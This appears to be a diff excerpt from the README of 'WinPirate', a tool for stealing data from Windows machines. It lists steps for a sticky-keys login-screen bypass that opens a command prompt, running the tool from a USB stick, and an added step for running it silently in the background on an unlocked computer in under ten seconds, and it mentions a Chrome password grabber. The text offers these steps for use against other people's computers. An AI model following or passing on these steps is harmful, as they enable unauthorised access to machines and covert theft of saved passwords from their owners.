Hackingzone/winpirate/README.md

 7) run sticky keys.sh
 8) restart and boot to Windows
 9) hit Shift 5 times fast, a command prompt will appear
 10) cd to the USB and run WinPirate.bat

+If the computer isn't locked:
+cd to the USB and run Run.bat (this will run WinPirate.bat silently in the background, it should be done in < 10 seconds

 #Current Issues
 1) The chrome passwords grabber that I made is still a .py    For it to work, I need to convert it to exe so it doesn't require python to be installed on the system.